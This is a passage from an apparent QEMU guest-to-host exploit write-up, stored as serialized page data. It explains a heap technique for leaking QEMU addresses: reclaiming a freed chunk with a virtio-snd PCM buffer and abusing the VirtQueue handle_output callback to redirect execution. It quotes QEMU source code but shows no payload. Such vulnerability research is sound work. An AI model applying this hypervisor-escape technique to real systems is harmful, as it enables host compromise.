a controlled chunk at a known address. The next step is to leak a QEMU code address so we can later redirect execution. To do this, we combine the arbitrary read primitive with the known-address chunk: we free that chunk, replace it with an object that contains pointers into QEMU's code or data, and then use arbitrary read to leak its fields.",{"type":28,"tag":29,"props":130184,"children":130185},{},[130186,130188,130193],{"type":33,"value":130187},"For this, we go back to virtio-snd and its buffer allocations. Recall ",{"type":28,"tag":98,"props":130189,"children":130191},{"className":130190},[],[130192],{"type":33,"value":123378},{"type":33,"value":4160},{"type":28,"tag":234,"props":130195,"children":130197},{"code":130196,"language":1797,"meta":7,"className":16176,"style":7},"static void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)\n{\n    VirtIOSound *vsnd = VIRTIO_SND(vdev);\n    VirtIOSoundPCMBuffer *buffer;\n    VirtQueueElement *elem;\n    size_t msg_sz, size;\n    uint32_t stream_id;\n\n    [...]\n\n    for (;;) {\n        VirtIOSoundPCMStream *stream;\n\n        elem = virtqueue_pop(vq, sizeof(VirtQueueElement));\n        if (!elem) {\n            break;\n        }\n        /* get the message hdr object */\n        msg_sz = iov_to_buf(elem->out_sg,\n                            elem->out_num,\n                            0,\n                            &hdr,\n                            sizeof(virtio_snd_pcm_xfer));\n        if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {\n            goto rx_err;\n        }\n        stream_id = le32_to_cpu(hdr.stream_id);\n\n        [...]\n\n        WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n            size = iov_size(elem->in_sg, elem->in_num) -\n                sizeof(virtio_snd_pcm_status);\n            buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);    // [1]\n            buffer->elem = elem;\n            buffer->vq = vq;                                            // [2]\n            buffer->size = 0;\n            buffer->offset = 0;\n            QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);\n        }\n",[130198],{"type":28,"tag":98,"props":130199,"children":130200},{"__ignoreMap":7},[130201,130244,130251,130282,130297,130312,130324,130337,130344,130351,130358,130369,130384,130391,130419,130438,130449,130456,130464,130501,130522,130534,130547,130560,130586,130598,130605,130643,130650,130657,130664,130695,130750,130762,130803,130826,130855,130882,130909,130941],{"type":28,"tag":116,"props":130202,"children":130203},{"class":245,"line":246},[130204,130208,130212,130216,130220,130224,130228,130232,130236,130240],{"type":28,"tag":116,"props":130205,"children":130206},{"style":376},[130207],{"type":33,"value":50664},{"type":28,"tag":116,"props":130209,"children":130210},{"style":376},[130211],{"type":33,"value":2169},{"type":28,"tag":116,"props":130213,"children":130214},{"style":282},[130215],{"type":33,"value":123457},{"type":28,"tag":116,"props":130217,"children":130218},{"style":266},[130219],{"type":33,"value":123462},{"type":28,"tag":116,"props":130221,"children":130222},{"style":370},[130223],{"type":33,"value":4240},{"type":28,"tag":116,"props":130225,"children":130226},{"style":272},[130227],{"type":33,"value":123471},{"type":28,"tag":116,"props":130229,"children":130230},{"style":266},[130231],{"type":33,"value":123476},{"type":28,"tag":116,"props":130233,"children":130234},{"style":370},[130235],{"type":33,"value":4240},{"type":28,"tag":116,"props":130237,"children":130238},{"style":272},[130239],{"type":33,"value":123485},{"type":28,"tag":116,"props":130241,"children":130242},{"style":266},[130243],{"type":33,"value":2830},{"type":28,"tag":116,"props":130245,"children":130246},{"class":245,"line":256},[130247],{"type":28,"tag":116,"props":130248,"children":130249},{"style":266},[130250],{"type":33,"value":10547},{"type":28,"tag":116,"props":130252,"children":130253},{"class":245,"line":293},[130254,130259,130263,130268,130272,130277],{"type":28,"tag":116,"props":130255,"children":130256},{"style":266},[130257],{"type":33,"value":130258},"    VirtIOSound ",{"type":28,"tag":116,"props":130260,"children":130261},{"style":370},[130262],{"type":33,"value":4240},{"type":28,"tag":116,"props":130264,"children":130265},{"style":266},[130266],{"type":33,"value":130267},"vsnd ",{"type":28,"tag":116,"props":130269,"children":130270},{"style":370},[130271],{"type":33,"value":373},{"type":28,"tag":116,"props":130273,"children":130274},{"style":282},[130275],{"type":33,"value":130276}," VIRTIO_SND",{"type":28,"tag":116,"props":130278,"children":130279},{"style":266},[130280],{"type":33,"value":130281},"(vdev);\n",{"type":28,"tag":116,"props":130283,"children":130284},{"class":245,"line":361},[130285,130289,130293],{"type":28,"tag":116,"props":130286,"children":130287},{"style":266},[130288],{"type":33,"value":124475},{"type":28,"tag":116,"props":130290,"children":130291},{"style":370},[130292],{"type":33,"value":4240},{"type":28,"tag":116,"props":130294,"children":130295},{"style":266},[130296],{"type":33,"value":124484},{"type":28,"tag":116,"props":130298,"children":130299},{"class":245,"line":387},[130300,130304,130308],{"type":28,"tag":116,"props":130301,"children":130302},{"style":266},[130303],{"type":33,"value":123504},{"type":28,"tag":116,"props":130305,"children":130306},{"style":370},[130307],{"type":33,"value":4240},{"type":28,"tag":116,"props":130309,"children":130310},{"style":266},[130311],{"type":33,"value":123513},{"type":28,"tag":116,"props":130313,"children":130314},{"class":245,"line":400},[130315,130319],{"type":28,"tag":116,"props":130316,"children":130317},{"style":376},[130318],{"type":33,"value":16226},{"type":28,"tag":116,"props":130320,"children":130321},{"style":266},[130322],{"type":33,"value":130323}," msg_sz, size;\n",{"type":28,"tag":116,"props":130325,"children":130326},{"class":245,"line":614},[130327,130332],{"type":28,"tag":116,"props":130328,"children":130329},{"style":376},[130330],{"type":33,"value":130331},"    uint32_t",{"type":28,"tag":116,"props":130333,"children":130334},{"style":266},[130335],{"type":33,"value":130336}," stream_id;\n",{"type":28,"tag":116,"props":130338,"children":130339},{"class":245,"line":631},[130340],{"type":28,"tag":116,"props":130341,"children":130342},{"emptyLinePlaceholder":19},[130343],{"type":33,"value":1044},{"type":28,"tag":116,"props":130345,"children":130346},{"class":245,"line":665},[130347],{"type":28,"tag":116,"props":130348,"children":130349},{"style":266},[130350],{"type":33,"value":104414},{"type":28,"tag":116,"props":130352,"children":130353},{"class":245,"line":713},[130354],{"type":28,"tag":116,"props":130355,"children":130356},{"emptyLinePlaceholder":19},[130357],{"type":33,"value":1044},{"type":28,"tag":116,"props":130359,"children":130360},{"class":245,"line":750},[130361,130365],{"type":28,"tag":116,"props":130362,"children":130363},{"style":260},[130364],{"type":33,"value":2703},{"type":28,"tag":116,"props":130366,"children":130367},{"style":266},[130368],{"type":33,"value":123539},{"type":28,"tag":116,"props":130370,"children":130371},{"class":245,"line":779},[130372,130376,130380],{"type":28,"tag":116,"props":130373,"children":130374},{"style":266},[130375],{"type":33,"value":123547},{"type":28,"tag":116,"props":130377,"children":130378},{"style":370},[130379],{"type":33,"value":4240},{"type":28,"tag":116,"props":130381,"children":130382},{"style":266},[130383],{"type":33,"value":123556},{"type":28,"tag":116,"props":130385,"children":130386},{"class":245,"line":796},[130387],{"type":28,"tag":116,"props":130388,"children":130389},{"emptyLinePlaceholder":19},[130390],{"type":33,"value":1044},{"type":28,"tag":116,"props":130392,"children":130393},{"class":245,"line":847},[130394,130398,130402,130406,130410,130414],{"type":28,"tag":116,"props":130395,"children":130396},{"style":266},[130397],{"type":33,"value":123571},{"type":28,"tag":116,"props":130399,"children":130400},{"style":370},[130401],{"type":33,"value":373},{"type":28,"tag":116,"props":130403,"children":130404},{"style":282},[130405],{"type":33,"value":123580},{"type":28,"tag":116,"props":130407,"children":130408},{"style":266},[130409],{"type":33,"value":123585},{"type":28,"tag":116,"props":130411,"children":130412},{"style":376},[130413],{"type":33,"value":54946},{"type":28,"tag":116,"props":130415,"children":130416},{"style":266},[130417],{"type":33,"value":130418},"(VirtQueueElement));\n",{"type":28,"tag":116,"props":130420,"children":130421},{"class":245,"line":898},[130422,130426,130430,130434],{"type":28,"tag":116,"props":130423,"children":130424},{"style":260},[130425],{"type":33,"value":2943},{"type":28,"tag":116,"props":130427,"children":130428},{"style":266},[130429],{"type":33,"value":269},{"type":28,"tag":116,"props":130431,"children":130432},{"style":370},[130433],{"type":33,"value":20285},{"type":28,"tag":116,"props":130435,"children":130436},{"style":266},[130437],{"type":33,"value":123619},{"type":28,"tag":116,"props":130439,"children":130440},{"class":245,"line":907},[130441,130445],{"type":28,"tag":116,"props":130442,"children":130443},{"style":260},[130444],{"type":33,"value":2969},{"type":28,"tag":116,"props":130446,"children":130447},{"style":266},[130448],{"type":33,"value":384},{"type":28,"tag":116,"props":130450,"children":130451},{"class":245,"line":981},[130452],{"type":28,"tag":116,"props":130453,"children":130454},{"style":266},[130455],{"type":33,"value":1954},{"type":28,"tag":116,"props":130457,"children":130458},{"class":245,"line":1011},[130459],{"type":28,"tag":116,"props":130460,"children":130461},{"style":250},[130462],{"type":33,"value":130463},"        /* get the message hdr object */\n",{"type":28,"tag":116,"props":130465,"children":130466},{"class":245,"line":1029},[130467,130472,130476,130481,130485,130489,130493,130497],{"type":28,"tag":116,"props":130468,"children":130469},{"style":266},[130470],{"type":33,"value":130471},"        msg_sz ",{"type":28,"tag":116,"props":130473,"children":130474},{"style":370},[130475],{"type":33,"value":373},{"type":28,"tag":116,"props":130477,"children":130478},{"style":282},[130479],{"type":33,"value":130480}," iov_to_buf",{"type":28,"tag":116,"props":130482,"children":130483},{"style":266},[130484],{"type":33,"value":313},{"type":28,"tag":116,"props":130486,"children":130487},{"style":272},[130488],{"type":33,"value":51682},{"type":28,"tag":116,"props":130490,"children":130491},{"style":266},[130492],{"type":33,"value":13423},{"type":28,"tag":116,"props":130494,"children":130495},{"style":272},[130496],{"type":33,"value":124023},{"type":28,"tag":116,"props":130498,"children":130499},{"style":266},[130500],{"type":33,"value":3178},{"type":28,"tag":116,"props":130502,"children":130503},{"class":245,"line":1038},[130504,130509,130513,130518],{"type":28,"tag":116,"props":130505,"children":130506},{"style":272},[130507],{"type":33,"value":130508},"                            elem",{"type":28,"tag":116,"props":130510,"children":130511},{"style":266},[130512],{"type":33,"value":13423},{"type":28,"tag":116,"props":130514,"children":130515},{"style":272},[130516],{"type":33,"value":130517},"out_num",{"type":28,"tag":116,"props":130519,"children":130520},{"style":266},[130521],{"type":33,"value":3178},{"type":28,"tag":116,"props":130523,"children":130524},{"class":245,"line":1047},[130525,130530],{"type":28,"tag":116,"props":130526,"children":130527},{"style":350},[130528],{"type":33,"value":130529},"                            0",{"type":28,"tag":116,"props":130531,"children":130532},{"style":266},[130533],{"type":33,"value":3178},{"type":28,"tag":116,"props":130535,"children":130536},{"class":245,"line":1071},[130537,130542],{"type":28,"tag":116,"props":130538,"children":130539},{"style":370},[130540],{"type":33,"value":130541},"                            &",{"type":28,"tag":116,"props":130543,"children":130544},{"style":266},[130545],{"type":33,"value":130546},"hdr,\n",{"type":28,"tag":116,"props":130548,"children":130549},{"class":245,"line":1137},[130550,130555],{"type":28,"tag":116,"props":130551,"children":130552},{"style":376},[130553],{"type":33,"value":130554},"                            sizeof",{"type":28,"tag":116,"props":130556,"children":130557},{"style":266},[130558],{"type":33,"value":130559},"(virtio_snd_pcm_xfer));\n",{"type":28,"tag":116,"props":130561,"children":130562},{"class":245,"line":1181},[130563,130567,130572,130576,130581],{"type":28,"tag":116,"props":130564,"children":130565},{"style":260},[130566],{"type":33,"value":2943},{"type":28,"tag":116,"props":130568,"children":130569},{"style":266},[130570],{"type":33,"value":130571}," (msg_sz ",{"type":28,"tag":116,"props":130573,"children":130574},{"style":370},[130575],{"type":33,"value":15350},{"type":28,"tag":116,"props":130577,"children":130578},{"style":376},[130579],{"type":33,"value":130580}," sizeof",{"type":28,"tag":116,"props":130582,"children":130583},{"style":266},[130584],{"type":33,"value":130585},"(virtio_snd_pcm_xfer)) {\n",{"type":28,"tag":116,"props":130587,"children":130588},{"class":245,"line":1212},[130589,130593],{"type":28,"tag":116,"props":130590,"children":130591},{"style":260},[130592],{"type":33,"value":60168},{"type":28,"tag":116,"props":130594,"children":130595},{"style":266},[130596],{"type":33,"value":130597}," rx_err;\n",{"type":28,"tag":116,"props":130599,"children":130600},{"class":245,"line":1254},[130601],{"type":28,"tag":116,"props":130602,"children":130603},{"style":266},[130604],{"type":33,"value":1954},{"type":28,"tag":116,"props":130606,"children":130607},{"class":245,"line":1262},[130608,130613,130617,130621,130625,130630,130634,130639],{"type":28,"tag":116,"props":130609,"children":130610},{"style":266},[130611],{"type":33,"value":130612},"        stream_id ",{"type":28,"tag":116,"props":130614,"children":130615},{"style":370},[130616],{"type":33,"value":373},{"type":28,"tag":116,"props":130618,"children":130619},{"style":282},[130620],{"type":33,"value":125485},{"type":28,"tag":116,"props":130622,"children":130623},{"style":266},[130624],{"type":33,"value":313},{"type":28,"tag":116,"props":130626,"children":130627},{"style":272},[130628],{"type":33,"value":130629},"hdr",{"type":28,"tag":116,"props":130631,"children":130632},{"style":266},[130633],{"type":33,"value":141},{"type":28,"tag":116,"props":130635,"children":130636},{"style":272},[130637],{"type":33,"value":130638},"stream_id",{"type":28,"tag":116,"props":130640,"children":130641},{"style":266},[130642],{"type":33,"value":895},{"type":28,"tag":116,"props":130644,"children":130645},{"class":245,"line":1294},[130646],{"type":28,"tag":116,"props":130647,"children":130648},{"emptyLinePlaceholder":19},[130649],{"type":33,"value":1044},{"type":28,"tag":116,"props":130651,"children":130652},{"class":245,"line":1334},[130653],{"type":28,"tag":116,"props":130654,"children":130655},{"style":266},[130656],{"type":33,"value":123652},{"type":28,"tag":116,"props":130658,"children":130659},{"class":245,"line":1372},[130660],{"type":28,"tag":116,"props":130661,"children":130662},{"emptyLinePlaceholder":19},[130663],{"type":33,"value":1044},{"type":28,"tag":116,"props":130665,"children":130666},{"class":245,"line":1381},[130667,130671,130675,130679,130683,130687,130691],{"type":28,"tag":116,"props":130668,"children":130669},{"style":282},[130670],{"type":33,"value":123667},{"type":28,"tag":116,"props":130672,"children":130673},{"style":266},[130674],{"type":33,"value":313},{"type":28,"tag":116,"props":130676,"children":130677},{"style":370},[130678],{"type":33,"value":2780},{"type":28,"tag":116,"props":130680,"children":130681},{"style":272},[130682],{"type":33,"value":1205},{"type":28,"tag":116,"props":130684,"children":130685},{"style":266},[130686],{"type":33,"value":13423},{"type":28,"tag":116,"props":130688,"children":130689},{"style":272},[130690],{"type":33,"value":123688},{"type":28,"tag":116,"props":130692,"children":130693},{"style":266},[130694],{"type":33,"value":844},{"type":28,"tag":116,"props":130696,"children":130697},{"class":245,"line":1389},[130698,130702,130706,130710,130714,130718,130722,130726,130730,130734,130738,130742,130746],{"type":28,"tag":116,"props":130699,"children":130700},{"style":266},[130701],{"type":33,"value":123700},{"type":28,"tag":116,"props":130703,"children":130704},{"style":370},[130705],{"type":33,"value":373},{"type":28,"tag":116,"props":130707,"children":130708},{"style":282},[130709],{"type":33,"value":123709},{"type":28,"tag":116,"props":130711,"children":130712},{"style":266},[130713],{"type":33,"value":313},{"type":28,"tag":116,"props":130715,"children":130716},{"style":272},[130717],{"type":33,"value":51682},{"type":28,"tag":116,"props":130719,"children":130720},{"style":266},[130721],{"type":33,"value":13423},{"type":28,"tag":116,"props":130723,"children":130724},{"style":272},[130725],{"type":33,"value":123726},{"type":28,"tag":116,"props":130727,"children":130728},{"style":266},[130729],{"type":33,"value":825},{"type":28,"tag":116,"props":130731,"children":130732},{"style":272},[130733],{"type":33,"value":51682},{"type":28,"tag":116,"props":130735,"children":130736},{"style":266},[130737],{"type":33,"value":13423},{"type":28,"tag":116,"props":130739,"children":130740},{"style":272},[130741],{"type":33,"value":123743},{"type":28,"tag":116,"props":130743,"children":130744},{"style":266},[130745],{"type":33,"value":1609},{"type":28,"tag":116,"props":130747,"children":130748},{"style":370},[130749],{"type":33,"value":50481},{"type":28,"tag":116,"props":130751,"children":130752},{"class":245,"line":1425},[130753,130757],{"type":28,"tag":116,"props":130754,"children":130755},{"style":376},[130756],{"type":33,"value":123759},{"type":28,"tag":116,"props":130758,"children":130759},{"style":266},[130760],{"type":33,"value":130761},"(virtio_snd_pcm_status);\n",{"type":28,"tag":116,"props":130763,"children":130764},{"class":245,"line":1448},[130765,130769,130773,130777,130781,130785,130789,130793,130798],{"type":28,"tag":116,"props":130766,"children":130767},{"style":266},[130768],{"type":33,"value":123777},{"type":28,"tag":116,"props":130770,"children":130771},{"style":370},[130772],{"type":33,"value":373},{"type":28,"tag":116,"props":130774,"children":130775},{"style":282},[130776],{"type":33,"value":123786},{"type":28,"tag":116,"props":130778,"children":130779},{"style":266},[130780],{"type":33,"value":313},{"type":28,"tag":116,"props":130782,"children":130783},{"style":376},[130784],{"type":33,"value":54946},{"type":28,"tag":116,"props":130786,"children":130787},{"style":266},[130788],{"type":33,"value":123799},{"type":28,"tag":116,"props":130790,"children":130791},{"style":370},[130792],{"type":33,"value":2268},{"type":28,"tag":116,"props":130794,"children":130795},{"style":266},[130796],{"type":33,"value":130797}," size);",{"type":28,"tag":116,"props":130799,"children":130800},{"style":250},[130801],{"type":33,"value":130802},"    // [1]\n",{"type":28,"tag":116,"props":130804,"children":130805},{"class":245,"line":1456},[130806,130810,130814,130818,130822],{"type":28,"tag":116,"props":130807,"children":130808},{"style":272},[130809],{"type":33,"value":123816},{"type":28,"tag":116,"props":130811,"children":130812},{"style":266},[130813],{"type":33,"value":13423},{"type":28,"tag":116,"props":130815,"children":130816},{"style":272},[130817],{"type":33,"value":51682},{"type":28,"tag":116,"props":130819,"children":130820},{"style":370},[130821],{"type":33,"value":2226},{"type":28,"tag":116,"props":130823,"children":130824},{"style":266},[130825],{"type":33,"value":123833},{"type":28,"tag":116,"props":130827,"children":130828},{"class":245,"line":1520},[130829,130833,130837,130841,130845,130850],{"type":28,"tag":116,"props":130830,"children":130831},{"style":272},[130832],{"type":33,"value":123816},{"type":28,"tag":116,"props":130834,"children":130835},{"style":266},[130836],{"type":33,"value":13423},{"type":28,"tag":116,"props":130838,"children":130839},{"style":272},[130840],{"type":33,"value":123485},{"type":28,"tag":116,"props":130842,"children":130843},{"style":370},[130844],{"type":33,"value":2226},{"type":28,"tag":116,"props":130846,"children":130847},{"style":266},[130848],{"type":33,"value":130849}," vq;",{"type":28,"tag":116,"props":130851,"children":130852},{"style":250},[130853],{"type":33,"value":130854},"                                            // [2]\n",{"type":28,"tag":116,"props":130856,"children":130857},{"class":245,"line":1580},[130858,130862,130866,130870,130874,130878],{"type":28,"tag":116,"props":130859,"children":130860},{"style":272},[130861],{"type":33,"value":123816},{"type":28,"tag":116,"props":130863,"children":130864},{"style":266},[130865],{"type":33,"value":13423},{"type":28,"tag":116,"props":130867,"children":130868},{"style":272},[130869],{"type":33,"value":123873},{"type":28,"tag":116,"props":130871,"children":130872},{"style":370},[130873],{"type":33,"value":2226},{"type":28,"tag":116,"props":130875,"children":130876},{"style":350},[130877],{"type":33,"value":2718},{"type":28,"tag":116,"props":130879,"children":130880},{"style":266},[130881],{"type":33,"value":384},{"type":28,"tag":116,"props":130883,"children":130884},{"class":245,"line":1620},[130885,130889,130893,130897,130901,130905],{"type":28,"tag":116,"props":130886,"children":130887},{"style":272},[130888],{"type":33,"value":123816},{"type":28,"tag":116,"props":130890,"children":130891},{"style":266},[130892],{"type":33,"value":13423},{"type":28,"tag":116,"props":130894,"children":130895},{"style":272},[130896],{"type":33,"value":13567},{"type":28,"tag":116,"props":130898,"children":130899},{"style":370},[130900],{"type":33,"value":2226},{"type":28,"tag":116,"props":130902,"children":130903},{"style":350},[130904],{"type":33,"value":2718},{"type":28,"tag":116,"props":130906,"children":130907},{"style":266},[130908],{"type":33,"value":384},{"type":28,"tag":116,"props":130910,"children":130911},{"class":245,"line":1668},[130912,130916,130920,130924,130928,130932,130936],{"type":28,"tag":116,"props":130913,"children":130914},{"style":282},[130915],{"type":33,"value":123920},{"type":28,"tag":116,"props":130917,"children":130918},{"style":266},[130919],{"type":33,"value":313},{"type":28,"tag":116,"props":130921,"children":130922},{"style":370},[130923],{"type":33,"value":2780},{"type":28,"tag":116,"props":130925,"children":130926},{"style":272},[130927],{"type":33,"value":1205},{"type":28,"tag":116,"props":130929,"children":130930},{"style":266},[130931],{"type":33,"value":13423},{"type":28,"tag":116,"props":130933,"children":130934},{"style":272},[130935],{"type":33,"value":123941},{"type":28,"tag":116,"props":130937,"children":130938},{"style":266},[130939],{"type":33,"value":130940},", buffer, entry);\n",{"type":28,"tag":116,"props":130942,"children":130943},{"class":245,"line":1677},[130944],{"type":28,"tag":116,"props":130945,"children":130946},{"style":266},[130947],{"type":33,"value":1954},{"type":28,"tag":29,"props":130949,"children":130950},{},[130951,130952,130957,130959,130964,130966,130971,130973,130979],{"type":33,"value":123995},{"type":28,"tag":98,"props":130953,"children":130955},{"className":130954},[],[130956],{"type":33,"value":124001},{"type":33,"value":130958},", QEMU allocates a ",{"type":28,"tag":98,"props":130960,"children":130962},{"className":130961},[],[130963],{"type":33,"value":124138},{"type":33,"value":130965}," whose size depends on the guest-provided iovec, and at ",{"type":28,"tag":98,"props":130967,"children":130969},{"className":130968},[],[130970],{"type":33,"value":124036},{"type":33,"value":130972}," it stores the ",{"type":28,"tag":98,"props":130974,"children":130976},{"className":130975},[],[130977],{"type":33,"value":130978},"VirtQueue *vq",{"type":33,"value":130980}," pointer into the buffer.",{"type":28,"tag":29,"props":130982,"children":130983},{},[130984,130985,130991],{"type":33,"value":63836},{"type":28,"tag":98,"props":130986,"children":130988},{"className":130987},[],[130989],{"type":33,"value":130990},"VirtQueue",{"type":33,"value":130992}," structure contains some useful fields:",{"type":28,"tag":234,"props":130994,"children":130996},{"code":130995,"language":1797,"meta":7,"className":16176,"style":7},"struct VirtQueue\n{\n    [...]\n\n    VirtIOHandleOutput handle_output;\n    VirtIODevice *vdev;\n\n    [...]\n};\n",[130997],{"type":28,"tag":98,"props":130998,"children":130999},{"__ignoreMap":7},[131000,131012,131019,131026,131033,131041,131058,131065,131072],{"type":28,"tag":116,"props":131001,"children":131002},{"class":245,"line":246},[131003,131007],{"type":28,"tag":116,"props":131004,"children":131005},{"style":376},[131006],{"type":33,"value":9069},{"type":28,"tag":116,"props":131008,"children":131009},{"style":266},[131010],{"type":33,"value":131011}," VirtQueue\n",{"type":28,"tag":116,"props":131013,"children":131014},{"class":245,"line":256},[131015],{"type":28,"tag":116,"props":131016,"children":131017},{"style":266},[131018],{"type":33,"value":10547},{"type":28,"tag":116,"props":131020,"children":131021},{"class":245,"line":293},[131022],{"type":28,"tag":116,"props":131023,"children":131024},{"style":266},[131025],{"type":33,"value":104414},{"type":28,"tag":116,"props":131027,"children":131028},{"class":245,"line":361},[131029],{"type":28,"tag":116,"props":131030,"children":131031},{"emptyLinePlaceholder":19},[131032],{"type":33,"value":1044},{"type":28,"tag":116,"props":131034,"children":131035},{"class":245,"line":387},[131036],{"type":28,"tag":116,"props":131037,"children":131038},{"style":266},[131039],{"type":33,"value":131040},"    VirtIOHandleOutput handle_output;\n",{"type":28,"tag":116,"props":131042,"children":131043},{"class":245,"line":400},[131044,131049,131053],{"type":28,"tag":116,"props":131045,"children":131046},{"style":266},[131047],{"type":33,"value":131048},"    VirtIODevice ",{"type":28,"tag":116,"props":131050,"children":131051},{"style":370},[131052],{"type":33,"value":4240},{"type":28,"tag":116,"props":131054,"children":131055},{"style":266},[131056],{"type":33,"value":131057},"vdev;\n",{"type":28,"tag":116,"props":131059,"children":131060},{"class":245,"line":614},[131061],{"type":28,"tag":116,"props":131062,"children":131063},{"emptyLinePlaceholder":19},[131064],{"type":33,"value":1044},{"type":28,"tag":116,"props":131066,"children":131067},{"class":245,"line":631},[131068],{"type":28,"tag":116,"props":131069,"children":131070},{"style":266},[131071],{"type":33,"value":104414},{"type":28,"tag":116,"props":131073,"children":131074},{"class":245,"line":665},[131075],{"type":28,"tag":116,"props":131076,"children":131077},{"style":266},[131078],{"type":33,"value":16239},{"type":28,"tag":29,"props":131080,"children":131081},{},[131082,131083,131089,131091,131097],{"type":33,"value":16275},{"type":28,"tag":98,"props":131084,"children":131086},{"className":131085},[],[131087],{"type":33,"value":131088},".handle_output",{"type":33,"value":131090}," field is a callback, specifically a function pointer that gets called when the virtqueue receives a notification from the guest, and ",{"type":28,"tag":98,"props":131092,"children":131094},{"className":131093},[],[131095],{"type":33,"value":131096},".vdev",{"type":33,"value":131098}," is the pointer passed to it as the first argument:",{"type":28,"tag":234,"props":131100,"children":131102},{"code":131101,"language":1797,"meta":7,"className":16176,"style":7},"static void virtio_queue_notify_vq(VirtQueue *vq)\n{\n    if (vq->vring.desc && vq->handle_output) {\n        VirtIODevice *vdev = vq->vdev;\n\n        [...]\n\n        vq->handle_output(vdev, vq);\n\n        [...]\n    }\n}\n",[131103],{"type":28,"tag":98,"props":131104,"children":131105},{"__ignoreMap":7},[131106,131139,131146,131201,131238,131245,131252,131259,131280,131287,131294,131301],{"type":28,"tag":116,"props":131107,"children":131108},{"class":245,"line":246},[131109,131113,131117,131122,131127,131131,131135],{"type":28,"tag":116,"props":131110,"children":131111},{"style":376},[131112],{"type":33,"value":50664},{"type":28,"tag":116,"props":131114,"children":131115},{"style":376},[131116],{"type":33,"value":2169},{"type":28,"tag":116,"props":131118,"children":131119},{"style":282},[131120],{"type":33,"value":131121}," virtio_queue_notify_vq",{"type":28,"tag":116,"props":131123,"children":131124},{"style":266},[131125],{"type":33,"value":131126},"(VirtQueue ",{"type":28,"tag":116,"props":131128,"children":131129},{"style":370},[131130],{"type":33,"value":4240},{"type":28,"tag":116,"props":131132,"children":131133},{"style":272},[131134],{"type":33,"value":123485},{"type":28,"tag":116,"props":131136,"children":131137},{"style":266},[131138],{"type":33,"value":2830},{"type":28,"tag":116,"props":131140,"children":131141},{"class":245,"line":256},[131142],{"type":28,"tag":116,"props":131143,"children":131144},{"style":266},[131145],{"type":33,"value":10547},{"type":28,"tag":116,"props":131147,"children":131148},{"class":245,"line":293},[131149,131153,131157,131161,131165,131170,131174,131179,131183,131188,131192,131197],{"type":28,"tag":116,"props":131150,"children":131151},{"style":260},[131152],{"type":33,"value":11947},{"type":28,"tag":116,"props":131154,"children":131155},{"style":266},[131156],{"type":33,"value":269},{"type":28,"tag":116,"props":131158,"children":131159},{"style":272},[131160],{"type":33,"value":123485},{"type":28,"tag":116,"props":131162,"children":131163},{"style":266},[131164],{"type":33,"value":13423},{"type":28,"tag":116,"props":131166,"children":131167},{"style":272},[131168],{"type":33,"value":131169},"vring",{"type":28,"tag":116,"props":131171,"children":131172},{"style":266},[131173],{"type":33,"value":141},{"type":28,"tag":116,"props":131175,"children":131176},{"style":272},[131177],{"type":33,"value":131178},"desc",{"type":28,"tag":116,"props":131180,"children":131181},{"style":370},[131182],{"type":33,"value":13851},{"type":28,"tag":116,"props":131184,"children":131185},{"style":272},[131186],{"type":33,"value":131187}," vq",{"type":28,"tag":116,"props":131189,"children":131190},{"style":266},[131191],{"type":33,"value":13423},{"type":28,"tag":116,"props":131193,"children":131194},{"style":272},[131195],{"type":33,"value":131196},"handle_output",{"type":28,"tag":116,"props":131198,"children":131199},{"style":266},[131200],{"type":33,"value":844},{"type":28,"tag":116,"props":131202,"children":131203},{"class":245,"line":361},[131204,131209,131213,131218,131222,131226,131230,131234],{"type":28,"tag":116,"props":131205,"children":131206},{"style":266},[131207],{"type":33,"value":131208},"        VirtIODevice ",{"type":28,"tag":116,"props":131210,"children":131211},{"style":370},[131212],{"type":33,"value":4240},{"type":28,"tag":116,"props":131214,"children":131215},{"style":266},[131216],{"type":33,"value":131217},"vdev ",{"type":28,"tag":116,"props":131219,"children":131220},{"style":370},[131221],{"type":33,"value":373},{"type":28,"tag":116,"props":131223,"children":131224},{"style":272},[131225],{"type":33,"value":131187},{"type":28,"tag":116,"props":131227,"children":131228},{"style":266},[131229],{"type":33,"value":13423},{"type":28,"tag":116,"props":131231,"children":131232},{"style":272},[131233],{"type":33,"value":123471},{"type":28,"tag":116,"props":131235,"children":131236},{"style":266},[131237],{"type":33,"value":384},{"type":28,"tag":116,"props":131239,"children":131240},{"class":245,"line":387},[131241],{"type":28,"tag":116,"props":131242,"children":131243},{"emptyLinePlaceholder":19},[131244],{"type":33,"value":1044},{"type":28,"tag":116,"props":131246,"children":131247},{"class":245,"line":400},[131248],{"type":28,"tag":116,"props":131249,"children":131250},{"style":266},[131251],{"type":33,"value":123652},{"type":28,"tag":116,"props":131253,"children":131254},{"class":245,"line":614},[131255],{"type":28,"tag":116,"props":131256,"children":131257},{"emptyLinePlaceholder":19},[131258],{"type":33,"value":1044},{"type":28,"tag":116,"props":131260,"children":131261},{"class":245,"line":631},[131262,131267,131271,131275],{"type":28,"tag":116,"props":131263,"children":131264},{"style":272},[131265],{"type":33,"value":131266},"        vq",{"type":28,"tag":116,"props":131268,"children":131269},{"style":266},[131270],{"type":33,"value":13423},{"type":28,"tag":116,"props":131272,"children":131273},{"style":282},[131274],{"type":33,"value":131196},{"type":28,"tag":116,"props":131276,"children":131277},{"style":266},[131278],{"type":33,"value":131279},"(vdev, vq);\n",{"type":28,"tag":116,"props":131281,"children":131282},{"class":245,"line":665},[131283],{"type":28,"tag":116,"props":131284,"children":131285},{"emptyLinePlaceholder":19},[131286],{"type":33,"value":1044},{"type":28,"tag":116,"props":131288,"children":131289},{"class":245,"line":713},[131290],{"type":28,"tag":116,"props":131291,"children":131292},{"style":266},[131293],{"type":33,"value":123652},{"type":28,"tag":116,"props":131295,"children":131296},{"class":245,"line":750},[131297],{"type":28,"tag":116,"props":131298,"children":131299},{"style":266},[131300],{"type":33,"value":3025},{"type":28,"tag":116,"props":131302,"children":131303},{"class":245,"line":779},[131304],{"type":28,"tag":116,"props":131305,"children":131306},{"style":266},[131307],{"type":33,"value":406},{"type":28,"tag":29,"props":131309,"children":131310},{},[131311,131313,131318,131320,131325,131327,131333,131335,131340,131341,131346,131348,131353],{"type":33,"value":131312},"This means that if we free the known-address chunk and replace it with a ",{"type":28,"tag":98,"props":131314,"children":131316},{"className":131315},[],[131317],{"type":33,"value":124138},{"type":33,"value":131319}," - which is straightforward, since we control the buffer allocation size through the 